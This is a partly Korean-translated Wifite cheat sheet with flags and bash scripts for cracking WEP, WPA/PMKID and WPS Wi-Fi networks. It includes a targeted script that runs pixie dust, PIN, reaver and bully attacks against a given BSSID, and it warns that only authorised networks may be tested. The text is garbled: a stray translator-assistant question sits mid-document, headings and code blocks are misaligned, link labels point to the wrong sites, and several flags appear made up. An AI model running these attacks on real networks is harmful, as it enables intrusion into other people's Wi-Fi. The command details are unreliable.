Wifite 치트 시트
개요
Wifite는 WEP, WPA, WPS 암호화된 네트워크를 감사하는 과정을 간소화하는 자동화된 무선 공격 도구입니다. aircrack-ng, reaver, bully 등 여러 도구를 단일하고 사용하기 쉬운 인터페이스로 통합하여 무선 침투 테스트와 관련된 지루한 작업을 많이 자동화합니다. Wifite는 보안 취약점을 자동으로 감지하고 다양한 공격 방법을 사용하여 무선 네트워크를 크랙하려고 시도할 수 있습니다.
⚠️ 경고: Wifite는 자신이 소유하거나 명시적인 허가를 받은 무선 네트워크에 대해서만 사용하세요. 허가되지 않은 무선 공격은 현지 법률 및 규정을 위반할 수 있습니다.
Would you like me to continue with the rest of the document? Please provide the remaining sections for translation.```bash
Wifite is pre-installed on Kali Linux
wifite —help
Update to latest version
sudo apt update sudo apt install wifite
Install Wifite2 (newer version)
sudo apt install wifite2
### Ubuntu/Debian Installation
```bash
# Install dependencies first
sudo apt update
sudo apt install python3 python3-pip aircrack-ng reaver bully pixiewps
# Install from package manager
sudo apt install wifite
# Or install via pip
sudo pip3 install wifite2
# Install additional tools for full functionality
sudo apt install hashcat hcxdumptool hcxtools tsharkManual Installation
# Clone Wifite2 repository
git clone https://github.com/derv82/wifite2.git
cd wifite2
# Install Python dependencies
sudo pip3 install -r requirements.txt
# Install Wifite
sudo python3 setup.py install
# Make executable
sudo chmod +x wifite.py
sudo ln -s $(pwd)/wifite.py /usr/local/bin/wifite
# Verify installation
wifite --helpDocker Installation
# Pull Wifite Docker image
docker pull kalilinux/kali-rolling
# Run with network privileges
docker run -it --rm --net=host --privileged \
-v /dev/bus/usb:/dev/bus/usb \
kalilinux/kali-rolling
# Inside container, install Wifite
apt update && apt install -y wifiteDependencies and Tools
Required Tools
# Check required tools
wifite --check
# Install aircrack-ng suite
sudo apt install aircrack-ng
# Install reaver for WPS attacks
sudo apt install reaver
# Install bully (alternative WPS tool)
sudo apt install bully
# Install pixiewps for WPS PIN attacks
sudo apt install pixiewps
# Install hashcat for password cracking
sudo apt install hashcat
# Install hcxtools for PMKID attacks
sudo apt install hcxdumptool hcxtoolsOptional Tools
# Install tshark for packet analysis
sudo apt install tshark
# Install cowpatty for WPA cracking
sudo apt install cowpatty
# Install john the ripper
sudo apt install john
# Install macchanger for MAC spoofing
sudo apt install macchanger
# Install pyrit for GPU acceleration
sudo apt install pyritBasic Usage
Interface Setup
# List available interfaces
wifite --list-interfaces
# Use specific interface
wifite --interface wlan0
# Put interface in monitor mode manually
sudo airmon-ng start wlan0
# Check monitor mode interfaces
iwconfigBasic Scanning and Attacks
# Basic scan and attack
sudo wifite
# Scan specific interface
sudo wifite --interface wlan0
# Attack specific target by BSSID
sudo wifite --bssid AA:BB:CC:DD:EE:FF
# Attack specific target by ESSID
sudo wifite --essid "TargetNetwork"
# Show verbose output
sudo wifite --verbose
# Quiet mode (minimal output)
sudo wifite --quietTarget Selection
# Attack only WEP networks
sudo wifite --wep
# Attack only WPA networks
sudo wifite --wpa
# Attack only WPS networks
sudo wifite --wps
# Attack networks with specific encryption
sudo wifite --wep --wpa --wps
# Filter by signal strength (minimum dBm)
sudo wifite --min-power -50
# Attack only networks with clients
sudo wifite --clients-onlyWEP Attacks
Basic WEP Cracking
# Target only WEP networks
sudo wifite --wep
# Specify WEP timeout
sudo wifite --wep --wep-timeout 600
# Set packet threshold for WEP
sudo wifite --wep --wep-pps 300
# Use specific WEP attack methods
sudo wifite --wep --wep-filter
# Keep temporary files for analysis
sudo wifite --wep --keep-ivsAdvanced WEP Options
# Replay attack options
sudo wifite --wep --wep-pps 500 --wep-timeout 1200
# Use ARP replay attack
sudo wifite --wep --wep-replay
# Use fragmentation attack
sudo wifite --wep --wep-frag
# Use chopchop attack
sudo wifite --wep --wep-chopchop
# Combine multiple attack methods
sudo wifite --wep --wep-replay --wep-frag --wep-chopchopWPA/WPA2 Attacks
Handshake Capture
# Target WPA networks
sudo wifite --wpa
# Set handshake timeout
sudo wifite --wpa --wpa-timeout 300
# Specify handshake directory
sudo wifite --wpa --wpa-handshake-dir /tmp/handshakes
# Deauth packet count
sudo wifite --wpa --wpa-deauth-timeout 10
# Attack with custom wordlist
sudo wifite --wpa --dict /path/to/wordlist.txtPMKID Attacks
# Enable PMKID attack
sudo wifite --wpa --pmkid
# PMKID timeout
sudo wifite --wpa --pmkid --pmkid-timeout 300
# Combine handshake and PMKID
sudo wifite --wpa --pmkid --wpa-handshake
# Use specific PMKID tool
sudo wifite --wpa --pmkid --hcxdumptool-timeout 60WPA Cracking Options
# Use aircrack-ng for cracking
sudo wifite --wpa --wpa-attack aircrack
# Use hashcat for cracking
sudo wifite --wpa --wpa-attack hashcat
# Use john the ripper
sudo wifite --wpa --wpa-attack john
# Specify custom wordlist
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt
# Strip handshake (remove unnecessary data)
sudo wifite --wpa --wpa-stripWPS Attacks
Basic WPS Attacks
# Target only WPS networks
sudo wifite --wps
# WPS timeout setting
sudo wifite --wps --wps-timeout 300
# Maximum WPS attempts
sudo wifite --wps --wps-attempts 100
# WPS attack methods
sudo wifite --wps --wps-pixie --wps-pinPixie Dust Attack
# Pixie dust attack only
sudo wifite --wps --wps-pixie
# Pixie dust timeout
sudo wifite --wps --wps-pixie --pixie-timeout 300
# Skip PIN attack if pixie fails
sudo wifite --wps --wps-pixie --wps-no-pin
# Use specific pixie tool
sudo wifite --wps --wps-pixie --pixie-tool pixiewpsWPS PIN Attacks
# PIN attack only
sudo wifite --wps --wps-pin
# PIN attack timeout
sudo wifite --wps --wps-pin --pin-timeout 3600
# Use reaver for PIN attack
sudo wifite --wps --wps-pin --reaver
# Use bully for PIN attack
sudo wifite --wps --wps-pin --bully
# Custom PIN attempts
sudo wifite --wps --wps-pin --wps-attempts 1000Advanced Options
Output and Logging
# Specify output directory
sudo wifite --out-dir /tmp/wifite_results
# Keep temporary files
sudo wifite --keep-temp
# Save cracked passwords
sudo wifite --cracked-file /tmp/cracked.txt
# Verbose logging
sudo wifite --verbose --out-dir /tmp/logs
# Quiet mode with logging
sudo wifite --quiet --out-dir /tmp/resultsNetwork Filtering
# Filter by manufacturer
sudo wifite --manufacturer Linksys
# Filter by channel
sudo wifite --channel 6
# Multiple channels
sudo wifite --channel 1,6,11
# Exclude specific networks
sudo wifite --ignore-essid "MyNetwork,GuestWiFi"
# Include only specific networks
sudo wifite --essid "TargetNetwork"
# Filter by encryption type
sudo wifite --wpa --wps --ignore-wep
```### 공격 맞춤 설정
```bash
# Custom deauth count
sudo wifite --wpa-deauth 5
# Custom scan time
sudo wifite --scan-time 30
# Attack timeout
sudo wifite --attack-timeout 3600
# Number of targets to attack
sudo wifite --num-targets 5
# Infinite attack mode
sudo wifite --infinite
```## 자동화 스크립트
```bash
#!/bin/bash
# Comprehensive wireless security assessment with Wifite
INTERFACE="wlan0"
OUTPUT_DIR="wireless_assessment_$(date +%Y%m%d_%H%M%S)"
WORDLIST="/usr/share/wordlists/rockyou.txt"
SCAN_TIME=60
ATTACK_TIMEOUT=1800
mkdir -p "$OUTPUT_DIR"
# Function to setup interface
setup_interface() \\\\{
echo "[+] Setting up wireless interface: $INTERFACE"
# Kill conflicting processes
sudo airmon-ng check kill
# Start monitor mode
sudo airmon-ng start "$INTERFACE"
# Get monitor interface name
MONITOR_INTERFACE=$(iwconfig 2>/dev/null|grep "Mode:Monitor"|awk '\\\\{print $1\\\\}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface created: $MONITOR_INTERFACE"
return 0
\\\\}
# Function to run comprehensive scan
run_comprehensive_scan() \\\\{
echo "[+] Running comprehensive wireless assessment"
# WEP Assessment
echo "[+] Phase 1: WEP Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wep \
--wep-timeout "$ATTACK_TIMEOUT" \
--out-dir "$OUTPUT_DIR/wep" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1|tee "$OUTPUT_DIR/wep_assessment.log"
# WPA Assessment
echo "[+] Phase 2: WPA/WPA2 Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wpa \
--pmkid \
--wpa-timeout "$ATTACK_TIMEOUT" \
--dict "$WORDLIST" \
--out-dir "$OUTPUT_DIR/wpa" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1|tee "$OUTPUT_DIR/wpa_assessment.log"
# WPS Assessment
echo "[+] Phase 3: WPS Network Assessment"
sudo wifite \
--interface "$MONITOR_INTERFACE" \
--wps \
--wps-pixie \
--wps-pin \
--wps-timeout "$ATTACK_TIMEOUT" \
--out-dir "$OUTPUT_DIR/wps" \
--verbose \
--scan-time "$SCAN_TIME" \
2>&1|tee "$OUTPUT_DIR/wps_assessment.log"
\\\\}
# Function to generate report
generate_report() \\\\{
echo "[+] Generating assessment report"
local report_file="$OUTPUT_DIR/wireless_assessment_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>Wireless Security Assessment Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.header \\\\{ background-color: #f0f0f0; padding: 20px; border-radius: 5px; \\\\}
.section \\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; \\\\}
.vulnerable \\\\{ background-color: #ffebee; border-color: #f44336; \\\\}
.secure \\\\{ background-color: #e8f5e8; border-color: #4caf50; \\\\}
.warning \\\\{ background-color: #fff3e0; border-color: #ff9800; \\\\}
table \\\\{ border-collapse: collapse; width: 100%; margin: 10px 0; \\\\}
th, td \\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}
th \\\\{ background-color: #f2f2f2; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>Wireless Security Assessment Report</h1>
<p>Generated: $(date)</p>
<p>Assessment Duration: $(echo "scale=2; $ATTACK_TIMEOUT/60"|bc) minutes per phase</p>
</div>
EOF
# WEP Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WEP Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wep_assessment.log" ]; then
wep_cracked=$(grep -c "WEP KEY FOUND" "$OUTPUT_DIR/wep_assessment.log" 2>/dev/null||echo "0")
wep_total=$(grep -c "WEP" "$OUTPUT_DIR/wep_assessment.log" 2>/dev/null||echo "0")
if [ "$wep_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ CRITICAL: WEP Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wep_cracked out of $wep_total WEP networks</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"secure\">" >> "$report_file"
echo " <h3>✅ No WEP vulnerabilities exploited</h3>" >> "$report_file"
echo " <p>Tested $wep_total WEP networks</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# WPA Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WPA/WPA2 Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wpa_assessment.log" ]; then
wpa_cracked=$(grep -c "WPA KEY FOUND\|PMKID FOUND" "$OUTPUT_DIR/wpa_assessment.log" 2>/dev/null||echo "0")
handshakes=$(grep -c "handshake" "$OUTPUT_DIR/wpa_assessment.log" 2>/dev/null||echo "0")
if [ "$wpa_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ HIGH: WPA/WPA2 Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wpa_cracked WPA/WPA2 networks</p>" >> "$report_file"
echo " <p>Captured $handshakes handshakes for offline analysis</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"warning\">" >> "$report_file"
echo " <h3>⚠️ Handshakes captured for offline analysis</h3>" >> "$report_file"
echo " <p>Captured $handshakes handshakes - recommend stronger passwords</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# WPS Results
echo " <div class=\"section\">" >> "$report_file"
echo " <h2>WPS Network Assessment</h2>" >> "$report_file"
if [ -f "$OUTPUT_DIR/wps_assessment.log" ]; then
wps_cracked=$(grep -c "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/wps_assessment.log" 2>/dev/null||echo "0")
pixie_success=$(grep -c "Pixie" "$OUTPUT_DIR/wps_assessment.log" 2>/dev/null||echo "0")
if [ "$wps_cracked" -gt 0 ]; then
echo " <div class=\"vulnerable\">" >> "$report_file"
echo " <h3>⚠️ CRITICAL: WPS Networks Compromised</h3>" >> "$report_file"
echo " <p>Successfully cracked $wps_cracked WPS-enabled networks</p>" >> "$report_file"
echo " <p>Pixie dust attacks successful: $pixie_success</p>" >> "$report_file"
echo " </div>" >> "$report_file"
else
echo " <div class=\"secure\">" >> "$report_file"
echo " <h3>✅ WPS attacks unsuccessful</h3>" >> "$report_file"
echo " <p>WPS-enabled networks appear to be properly configured</p>" >> "$report_file"
echo " </div>" >> "$report_file"
fi
fi
echo " </div>" >> "$report_file"
# Recommendations
cat >> "$report_file" << EOF
<div class="section">
<h2>Security Recommendations</h2>
<ul>
<li><strong>Disable WEP:</strong> WEP encryption is fundamentally broken and should never be used</li>
<li><strong>Use WPA3:</strong> Upgrade to WPA3 where possible, or WPA2 with strong passwords</li>
<li><strong>Disable WPS:</strong> WPS is vulnerable to brute force and pixie dust attacks</li>
<li><strong>Strong Passwords:</strong> Use complex passwords with 15+ characters</li>
<li><strong>Regular Updates:</strong> Keep wireless equipment firmware updated</li>
<li><strong>Network Segmentation:</strong> Isolate wireless networks from critical systems</li>
<li><strong>Monitor for Rogue APs:</strong> Regularly scan for unauthorized access points</li>
</ul>
</div>
</body>
</html>
EOF
echo "[+] Report generated: $report_file"
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
# Restart network services
sudo systemctl restart NetworkManager 2>/dev/null||true
echo "[+] Cleanup completed"
\\\\}
# Trap cleanup on exit
trap cleanup EXIT
# Main execution
echo "[+] Starting comprehensive wireless security assessment"
echo "[+] Output directory: $OUTPUT_DIR"
# Check dependencies
if ! command -v wifite &> /dev/null; then
echo "[-] Wifite not found. Please install Wifite first."
exit 1
fi
if ! command -v airmon-ng &> /dev/null; then
echo "[-] airmon-ng not found. Please install aircrack-ng suite."
exit 1
fi
# Setup interface
if setup_interface; then
# Run assessment
run_comprehensive_scan
# Generate report
generate_report
echo "[+] Wireless security assessment completed"
echo "[+] Results saved in: $OUTPUT_DIR"
echo "[+] Open $OUTPUT_DIR/wireless_assessment_report.html for detailed results"
else
echo "[-] Failed to setup wireless interface"
exit 1
fi
```### 대상 WPS 공격 스크립트
```bash
#!/bin/bash
# Targeted WPS attack script with multiple methods
TARGET_BSSID="$1"
INTERFACE="wlan0"
OUTPUT_DIR="wps_attack_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET_BSSID" ]; then
echo "Usage: $0 <TARGET_BSSID>"
echo "Example: $0 AA:BB:CC:DD:EE:FF"
exit 1
fi
mkdir -p "$OUTPUT_DIR"
# Function to setup monitor mode
setup_monitor() \\\\{
echo "[+] Setting up monitor mode on $INTERFACE"
sudo airmon-ng check kill
sudo airmon-ng start "$INTERFACE"
MONITOR_INTERFACE=$(iwconfig 2>/dev/null|grep "Mode:Monitor"|awk '\\\\{print $1\\\\}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface: $MONITOR_INTERFACE"
return 0
\\\\}
# Function to run pixie dust attack
pixie_dust_attack() \\\\{
echo "[+] Attempting Pixie Dust attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/pixie_dust.log"
timeout 300 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--bssid "$TARGET_BSSID" \
--wps \
--wps-pixie \
--wps-no-pin \
--out-dir "$OUTPUT_DIR" \
--verbose \
2>&1|tee "$log_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$log_file"; then
echo "[+] Pixie Dust attack successful!"
return 0
else
echo "[-] Pixie Dust attack failed"
return 1
fi
\\\\}
# Function to run PIN attack
pin_attack() \\\\{
echo "[+] Attempting WPS PIN attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/pin_attack.log"
timeout 3600 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--bssid "$TARGET_BSSID" \
--wps \
--wps-pin \
--wps-attempts 1000 \
--out-dir "$OUTPUT_DIR" \
--verbose \
2>&1|tee "$log_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$log_file"; then
echo "[+] PIN attack successful!"
return 0
else
echo "[-] PIN attack failed"
return 1
fi
\\\\}
# Function to run reaver attack
reaver_attack() \\\\{
echo "[+] Attempting Reaver attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/reaver_attack.log"
timeout 1800 sudo reaver \
-i "$MONITOR_INTERFACE" \
-b "$TARGET_BSSID" \
-vv \
-K 1 \
-N \
-L \
-d 15 \
-T 0.5 \
-c 1 \
2>&1|tee "$log_file"
if grep -q "WPS PIN:" "$log_file"; then
echo "[+] Reaver attack successful!"
return 0
else
echo "[-] Reaver attack failed"
return 1
fi
\\\\}
# Function to run bully attack
bully_attack() \\\\{
echo "[+] Attempting Bully attack on $TARGET_BSSID"
local log_file="$OUTPUT_DIR/bully_attack.log"
timeout 1800 sudo bully \
"$MONITOR_INTERFACE" \
-b "$TARGET_BSSID" \
-v 3 \
-d \
-B \
2>&1|tee "$log_file"
if grep -q "PIN FOUND" "$log_file"; then
echo "[+] Bully attack successful!"
return 0
else
echo "[-] Bully attack failed"
return 1
fi
\\\\}
# Function to generate attack report
generate_attack_report() \\\\{
echo "[+] Generating attack report"
local report_file="$OUTPUT_DIR/wps_attack_report.txt"
cat > "$report_file" << EOF
WPS Attack Report
================
Target: $TARGET_BSSID
Date: $(date)
Interface: $MONITOR_INTERFACE
Attack Methods Attempted:
EOF
# Check results of each attack
if [ -f "$OUTPUT_DIR/pixie_dust.log" ]; then
echo "1. Pixie Dust Attack:" >> "$report_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/pixie_dust.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|WPS KEY|PSK" "$OUTPUT_DIR/pixie_dust.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/pin_attack.log" ]; then
echo "2. PIN Attack:" >> "$report_file"
if grep -q "WPS PIN FOUND\|WPS KEY FOUND" "$OUTPUT_DIR/pin_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|WPS KEY|PSK" "$OUTPUT_DIR/pin_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/reaver_attack.log" ]; then
echo "3. Reaver Attack:" >> "$report_file"
if grep -q "WPS PIN:" "$OUTPUT_DIR/reaver_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "WPS PIN|PSK" "$OUTPUT_DIR/reaver_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/bully_attack.log" ]; then
echo "4. Bully Attack:" >> "$report_file"
if grep -q "PIN FOUND" "$OUTPUT_DIR/bully_attack.log"; then
echo " Status: SUCCESS" >> "$report_file"
grep -E "PIN FOUND|PSK" "$OUTPUT_DIR/bully_attack.log" >> "$report_file"
else
echo " Status: FAILED" >> "$report_file"
fi
echo "" >> "$report_file"
fi
echo "[+] Report saved: $report_file"
\\\\}
# Cleanup function
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
sudo systemctl restart NetworkManager 2>/dev/null||true
\\\\}
trap cleanup EXIT
# Main execution
echo "[+] Starting targeted WPS attack on $TARGET_BSSID"
if setup_monitor; then
# Try pixie dust first (fastest)
if pixie_dust_attack; then
echo "[+] Target compromised via Pixie Dust attack!"
else
echo "[+] Pixie Dust failed, trying PIN attack..."
if pin_attack; then
echo "[+] Target compromised via PIN attack!"
else
echo "[+] Wifite attacks failed, trying manual tools..."
# Try reaver
if reaver_attack; then
echo "[+] Target compromised via Reaver!"
else
echo "[+] Reaver failed, trying Bully..."
if bully_attack; then
echo "[+] Target compromised via Bully!"
else
echo "[-] All WPS attacks failed"
fi
fi
fi
fi
generate_attack_report
echo "[+] Attack completed. Results in: $OUTPUT_DIR"
else
echo "[-] Failed to setup monitor mode"
exit 1
fi
```### 지속적 모니터링 스크립트
```bash
#!/bin/bash
# Continuous wireless monitoring and alerting
INTERFACE="wlan0"
SCAN_INTERVAL=300 # 5 minutes
ALERT_EMAIL="security@company.com"
KNOWN_NETWORKS_FILE="known_networks.txt"
LOG_DIR="wireless_monitoring"
mkdir -p "$LOG_DIR"
# Function to create known networks file
create_known_networks() \\\\{
if [ ! -f "$KNOWN_NETWORKS_FILE" ]; then
cat > "$KNOWN_NETWORKS_FILE" << 'EOF'
# Known legitimate networks
# Format: BSSID|ESSID|ENCRYPTION
AA:BB:CC:DD:EE:FF|CompanyWiFi|WPA2
11:22:33:44:55:66|GuestNetwork|WPA2
# Add your known networks here
EOF
echo "Created $KNOWN_NETWORKS_FILE - please configure with your known networks"
exit 1
fi
\\\\}
# Function to scan for networks
scan_networks() \\\\{
local timestamp=$(date +%Y%m%d_%H%M%S)
local scan_file="$LOG_DIR/scan_$timestamp.txt"
echo "[+] Scanning for wireless networks..."
timeout 60 sudo wifite \
--interface "$MONITOR_INTERFACE" \
--scan-time 30 \
--no-attack \
--out-dir "$LOG_DIR" \
2>&1|grep -E "BSSID|ESSID|WEP|WPA|WPS" > "$scan_file"
echo "$scan_file"
\\\\}
# Function to detect rogue networks
detect_rogue_networks() \\\\{
local scan_file="$1"
local timestamp=$(date +%Y%m%d_%H%M%S)
local rogue_file="$LOG_DIR/rogue_$timestamp.txt"
echo "[+] Analyzing scan results for rogue networks..."
> "$rogue_file" # Clear file
# Parse scan results and compare with known networks
while read -r line; do
if [[ "$line" =~ BSSID ]]; then
bssid=$(echo "$line"|grep -oE '([0-9A-Fa-f]\\\\{2\\\\}:)\\\\{5\\\\}[0-9A-Fa-f]\\\\{2\\\\}')
# Check if this BSSID is in known networks
if ! grep -q "$bssid" "$KNOWN_NETWORKS_FILE"; then
echo "$line" >> "$rogue_file"
fi
fi
done < "$scan_file"
if [ -s "$rogue_file" ]; then
echo "[!] Rogue networks detected!"
cat "$rogue_file"
# Send alert
echo "Rogue wireless networks detected at $(date)"|\
mail -s "SECURITY ALERT: Rogue Networks" -A "$rogue_file" "$ALERT_EMAIL" 2>/dev/null||\
echo "Alert: Rogue networks detected (email failed)"
else
echo "[+] No rogue networks detected"
fi
\\\\}
# Function to detect security issues
detect_security_issues() \\\\{
local scan_file="$1"
local timestamp=$(date +%Y%m%d_%H%M%S)
local issues_file="$LOG_DIR/security_issues_$timestamp.txt"
echo "[+] Checking for security issues..."
cat > "$issues_file" << EOF
Wireless Security Issues Report
Generated: $(date)
==============================
EOF
# Check for WEP networks
wep_count=$(grep -c "WEP" "$scan_file" 2>/dev/null||echo "0")
if [ "$wep_count" -gt 0 ]; then
echo "⚠️ WEP Networks Detected: $wep_count" >> "$issues_file"
grep "WEP" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Check for open networks
open_count=$(grep -c "Open" "$scan_file" 2>/dev/null||echo "0")
if [ "$open_count" -gt 0 ]; then
echo "⚠️ Open Networks Detected: $open_count" >> "$issues_file"
grep "Open" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Check for WPS enabled networks
wps_count=$(grep -c "WPS" "$scan_file" 2>/dev/null||echo "0")
if [ "$wps_count" -gt 0 ]; then
echo "⚠️ WPS Enabled Networks: $wps_count" >> "$issues_file"
grep "WPS" "$scan_file" >> "$issues_file"
echo "" >> "$issues_file"
fi
# Send alert if issues found
total_issues=$((wep_count + open_count + wps_count))
if [ "$total_issues" -gt 0 ]; then
echo "Wireless security issues detected: $total_issues"|\
mail -s "Wireless Security Issues" -A "$issues_file" "$ALERT_EMAIL" 2>/dev/null||\
echo "Alert: Security issues detected (email failed)"
fi
\\\\}
# Function to setup monitor mode
setup_monitor() \\\\{
echo "[+] Setting up monitor mode"
sudo airmon-ng check kill
sudo airmon-ng start "$INTERFACE"
MONITOR_INTERFACE=$(iwconfig 2>/dev/null|grep "Mode:Monitor"|awk '\\\\{print $1\\\\}')
if [ -z "$MONITOR_INTERFACE" ]; then
echo "[-] Failed to create monitor interface"
return 1
fi
echo "[+] Monitor interface: $MONITOR_INTERFACE"
return 0
\\\\}
# Cleanup function
cleanup() \\\\{
echo "[+] Stopping monitoring..."
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE"
fi
sudo systemctl restart NetworkManager 2>/dev/null||true
\\\\}
trap cleanup EXIT
# Main monitoring loop
echo "[+] Starting continuous wireless monitoring"
create_known_networks
if setup_monitor; then
echo "[+] Monitoring every $SCAN_INTERVAL seconds. Press Ctrl+C to stop."
while true; do
scan_file=$(scan_networks)
if [ -f "$scan_file" ] && [ -s "$scan_file" ]; then
detect_rogue_networks "$scan_file"
detect_security_issues "$scan_file"
else
echo "[-] Scan failed or no results"
fi
echo "[+] Next scan in $SCAN_INTERVAL seconds..."
sleep "$SCAN_INTERVAL"
done
else
echo "[-] Failed to setup monitor mode"
exit 1
fi
```## 문제 해결
```bash
# Check interface status
iwconfig
# Kill conflicting processes
sudo airmon-ng check kill
# Restart network manager
sudo systemctl restart NetworkManager
# Check for monitor mode support
iw list|grep monitor
# Manual monitor mode setup
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```#### 인터페이스 문제
```bash
# Run with sudo
sudo wifite
# Check user groups
groups $USER
# Add user to required groups
sudo usermod -aG netdev $USER
# Fix file permissions
sudo chmod +x /usr/bin/wifite
```#### 권한 문제
```bash
# Check required tools
wifite --check
# Install missing dependencies
sudo apt install aircrack-ng reaver bully pixiewps
# Update tool databases
sudo apt update && sudo apt upgrade
# Check tool versions
aircrack-ng --help
reaver -h
bully -h
```#### 도구 의존성
```bash
# Increase timeout values
sudo wifite --wpa-timeout 600
# Use specific attack methods
sudo wifite --wps --wps-pixie
# Check signal strength
sudo wifite --min-power -60
# Use verbose output for debugging
sudo wifite --verbose
```#### 공격 실패
```bash
# Reduce scan time
sudo wifite --scan-time 15
# Target specific networks
sudo wifite --essid "TargetNetwork"
# Use faster attack methods
sudo wifite --wps --wps-pixie --wps-no-pin
# Optimize for specific encryption
sudo wifite --wpa --pmkid
```### 성능 최적화
https://github.com/derv82/wifite2#
# 리소스
https://www.aircrack-ng.org/- [Wifite2 GitHub 저장소](https://github.com/t6x/reaver-wps-fork-t6x)https://www.sans.org/white-papers/36287/- [Aircrack-ng 문서](https://www.kb.cert.org/vuls/id/723755)https://standards.ieee.org/standard/802_11i-2004.html- [Reaver 문서](https://www.sans.org/white-papers/33649/)